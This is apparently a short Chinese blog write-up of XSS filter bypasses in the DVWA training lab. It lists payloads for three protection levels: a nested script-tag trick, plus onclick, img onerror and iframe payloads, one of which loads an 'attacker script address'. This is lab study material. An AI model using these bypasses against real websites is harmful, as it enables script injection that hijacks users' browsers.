Xss跨站总结

初级防护的代码

Poc:<script>alert(1)</script>

DVWA的Xss跨站总结-LMLPHP

上图防护的代码 为输入的结果就为输出的结果

中级防护的代码

Poc:<scri<script>pt>alert(1)</script>

DVWA的Xss跨站总结-LMLPHP

上图为输入的文本中只要包含<script>就给替换成空

解决思路:<scri<script>pt>alert(1)</script>  在<script>中再添加一个<script> 后添加的<script>替换为空但是外面的<script>依旧可以拼接起来。

高级防护的代码

DVWA的Xss跨站总结-LMLPHP

图上为只要包含script就替换掉

解决方法:

<a href=” onclick=alert(‘xss’)>zet</a>      #创建一个点击键zet点击后执行onclick=alert(‘xss’)

<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)>  #当错误时执行alert(‘xss’)

<iframe width=300 height=100 src=”http://攻击脚本地址”></iframe>

05-11 19:40